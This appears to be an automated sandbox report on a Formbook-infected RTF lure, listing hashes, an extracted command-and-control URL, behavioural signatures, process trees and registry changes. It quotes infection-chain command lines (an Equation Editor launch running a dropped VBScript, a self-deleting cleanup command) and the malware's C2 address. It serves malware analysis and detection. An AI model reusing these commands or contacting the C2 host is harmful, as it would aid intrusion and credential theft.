Analysis
max time kernel: 149s
max time network: 122s
platform: windows7_x64
resource: win7v20201028
submitted: 21-01-2021 10:21
Static task: static1
Behavioral task: behavioral1
Sample: RFQ-9837463.doc.rtf
Resource: win7v20201028
Behavioral task: behavioral2
Sample: RFQ-9837463.doc.rtf
Resource: win10v20201028
General
Target: RFQ-9837463.doc.rtf
Size: 2.0MB
MD5: 25af535599ad3e48d6b4713f8e599871
SHA1: a293b85372f9b0ffdacb46af40518f1341ddc248
SHA256: a8f4da2076bc00264891bc7872e70f245f47807c268fb921fc135b711c817b34
SHA512: 99b5b3f7606405b629519d35a6d442fee454a3bb2b5a571ae2595eeb0ace33b514d7114a70feae1c740573b1e11cb9528113d8eb51efe06a423858c3a553617b
Malware Config
Extracted
formbook
http://www.priscilafiorini.com/rcm/
Signatures
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: Powershell.exe
- description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process; pid: 1208; pid_target: 1628; process: Powershell.exe
Formbook Payload 3 IoCs
Processes:
- resource: behavioral1/memory/1464-25-0x000000000041EBE0-mapping.dmp; yara_rule: formbook
- resource: behavioral1/memory/1464-24-0x0000000000400000-0x000000000042E000-memory.dmp; yara_rule: formbook
- resource: behavioral1/memory/672-33-0x00000000000C0000-0x00000000000EE000-memory.dmp; yara_rule: formbook
Blocklisted process makes network request 1 IoCs
Processes: Powershell.exe
- flow: 7; pid: 1208; process: Powershell.exe
Drops file in System32 directory 1 IoCs
Processes: Powershell.exe
- description: File opened for modification; ioc: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk; process: Powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious use of SetThreadContext 3 IoCs
Processes: Powershell.exe, control.exe, colorcpl.exe
- description: PID 1208 set thread context of 1464; pid: 1208; process: Powershell.exe; target process: control.exe
- description: PID 1464 set thread context of 1276; pid: 1464; process: control.exe; target process: Explorer.EXE
- description: PID 672 set thread context of 1276; pid: 672; process: colorcpl.exe; target process: Explorer.EXE
Drops file in Windows directory 1 IoCs
Processes: WINWORD.EXE
- description: File opened for modification; ioc: C:\Windows\Debug\WIA\wiatrace.log; process: WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
Modifies Internet Explorer settings
Processes: WINWORD.EXE
- description: Key created; ioc: \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar; process: WINWORD.EXE
- description: Set value (str); ioc: \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"; process: WINWORD.EXE
- description: Set value (int); ioc: \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"; process: WINWORD.EXE
- description: Set value (str); ioc: \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"; process: WINWORD.EXE
- description: Key created; ioc: \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt; process: WINWORD.EXE
- description: Key created; ioc: \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote; process: WINWORD.EXE
- description: Set value (int); ioc: \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"; process: WINWORD.EXE
- description: Key created; ioc: \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel; process: WINWORD.EXE
- description: Set value (str); ioc: \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"; process: WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: WINWORD.EXE
- pid: 1732; process: WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 35 IoCs
Processes: Powershell.exe, control.exe, colorcpl.exe
- pid: 1208; process: Powershell.exe
- pid: 1464; process: control.exe
- pid: 672; process: colorcpl.exe
Suspicious behavior: MapViewOfSection 5 IoCs
Processes: control.exe, colorcpl.exe
- pid: 1464; process: control.exe
- pid: 672; process: colorcpl.exe
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes: Powershell.exe, control.exe, colorcpl.exe
- pid: 1208; process: Powershell.exe; tokens: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
- pid: 1464; process: control.exe; tokens: SeDebugPrivilege
- pid: 672; process: colorcpl.exe; tokens: SeDebugPrivilege
Suspicious use of FindShellTrayWindow 4 IoCs
Processes: Explorer.EXE
- pid: 1276; process: Explorer.EXE
Suspicious use of SendNotifyMessage 4 IoCs
Processes: Explorer.EXE
- pid: 1276; process: Explorer.EXE
Suspicious use of SetWindowsHookEx 2 IoCs
Processes: WINWORD.EXE
- pid: 1732; process: WINWORD.EXE
Suspicious use of WriteProcessMemory 23 IoCs
Processes: EQNEDT32.EXE, CmD.exe, Powershell.exe, Explorer.EXE, colorcpl.exe
- description: PID 1104 wrote to memory of 1360; pid: 1104; process: EQNEDT32.EXE; target process: CmD.exe
- description: PID 1360 wrote to memory of 1344; pid: 1360; process: CmD.exe; target process: cscript.exe
- description: PID 1208 wrote to memory of 1464; pid: 1208; process: Powershell.exe; target process: control.exe
- description: PID 1276 wrote to memory of 672; pid: 1276; process: Explorer.EXE; target process: colorcpl.exe
- description: PID 672 wrote to memory of 1100; pid: 672; process: colorcpl.exe; target process: cmd.exe
Processes
Process (tree level 1): C:\Windows\Explorer.EXE
Command line: C:\Windows\Explorer.EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
Process (tree level 2): C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ-9837463.doc.rtf"
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
Process (tree level 2): C:\Windows\SysWOW64\colorcpl.exe
Command line: "C:\Windows\SysWOW64\colorcpl.exe"
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
Process (tree level 3): C:\Windows\SysWOW64\cmd.exe
Command line: /c del "C:\WINDOWS\syswow64\control.exe"
Process (tree level 1): C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
Process (tree level 2): C:\Windows\SysWOW64\CmD.exe
Command line: CmD.exe /C cscript %tmp%\Client.vbs AC
- Suspicious use of WriteProcessMemory
Process (tree level 3): C:\Windows\SysWOW64\cscript.exe
Command line: cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs AC
Process (tree level 1): C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
Process (tree level 2): C:\WINDOWS\syswow64\control.exe
Command line: "{path}"
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Downloads
C:\Users\Admin\AppData\Local\Temp\Client.vbs
MD5: 4f557ca04c97858443c7f821db0ca8b8
SHA1: 0d00fd81e91c87ae2e17bd050e884000ad1d8a32
SHA256: 95a6cef0cf6e57371a24367c275196f71c640a7481a0e8fb0b6146f9a6536083
SHA512: c05cde005777dd674a52e3e70efd0079b93ff5bf2248b4f6ad7ffb4c8a2f0f7c05cbb320319bf28148606611cf673c725580b0678459c69d6dde797d8cc2a5d4